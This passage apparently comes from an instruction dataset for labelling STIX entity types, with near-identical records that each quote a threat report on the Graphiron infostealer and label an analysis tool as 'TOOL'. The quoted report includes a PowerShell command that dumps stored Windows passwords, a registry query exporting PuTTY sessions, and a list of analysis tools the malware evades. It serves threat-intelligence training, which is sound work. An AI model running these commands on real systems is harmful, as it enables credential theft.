"input": "### Entity:\nvmmat\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nreconstructor\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nCharles\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nMobaXTerm\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nx96dbg\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nidag64\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nNetworkMiner\n\n---\n\n### Text Passage:\nGraphiron functionality\nGraphiron is a two-stage threat consisting of a downloader (Downloader.Graphiron) and a payload (Infostealer.Graphiron).\nThe downloader contains hardcoded command-and-control (C&C) server addresses. When executed, it will check against a blacklist of malware analysis tools by checking for running processes with the names listed in Table 1.\nTable 1: Graphiron checks against a blacklist of malware analysis tools by checking for running processes with specific namesProcess names\n---\nBurpSuite, BurpSuiteFree, CFF Explorer, Charles, DumpIt, Fiddler, HTTPDebuggerSVC, HTTPDebuggerUI, HookExplorer, Immunity, ImportREC, LordPE, MegaDumper, NetworkMiner, PEToolW, Proxifier, RAMMap, RAMMap64, ResourceHacker, SysInspector, WSockExpert, WinDump, Wireshar, agent.py, autoruns, autoruns, dbgview, disassembly, dumpcap, filemon, httpdebugger, httpsMon, ida,idag, idag64, idaq, idaq64, idau, idau64, idaw, idaw64, joeboxcontrol, joeboxserver, mitmdump, mitmweb, ollydbg, pestudio, proc_analyzer, processhacker, procexp, procexp64, procmon, procmon64, protection_id, pslist, reconstructor, regmon, reshacker, rpcapd, scylla, scylla_64, scylla_86, smsniff, sniff_hit, tcpvcon, tcpview, tshark, vmmat, windbg, x32dbg, x64dbg, x96dbg\nIf no blacklisted processes are found, it will connect to a C&C server and download and decrypt the payload before adding it to autorun.\nThe downloader is configured to run just once. If it fails to download and install the payload it won\u2019t make further attempts nor send a heartbeat.\nGraphiron uses AES encryption with hardcoded keys. It creates temporary files with the \".lock\" and \".trash\" extensions. It uses hardcoded file names designed to masquerade as Microsoft office executables: OfficeTemplate.exe and MicrosoftOfficeDashboard.exe\nThe payload is capable of carrying out the following tasks:\n* Reads MachineGuid\n* Obtains the IP address from https://checkip.amazonaws.com\n* Retrieves the hostname, system info, and user info\n* Steals data from Firefox and Thunderbird\n* Steals private keys from MobaXTerm.\n* Steals SSH known hosts\n* Steals data from PuTTY\n* Steals stored passwords\n* Takes screenshots\n* Creates a directory\n* Lists a directory\n* Runs a shell command\n* Steals an arbitrary file\nPassword theft is carried out using the following PowerShell command:\n_[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault;$vault.RetrieveAll() % { $_.RetrievePassw_\n_ord();$_} Select UserName, Resource, Password Format-Table \u2013HideTableHeaders_\nThe following command was used to export the list of PuTTY sessions:\n_\"CSIDL_SYSTEM\\reg.exe\" query HKCU\\Software\\SimonTatham\\Putty\\Sessions_\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
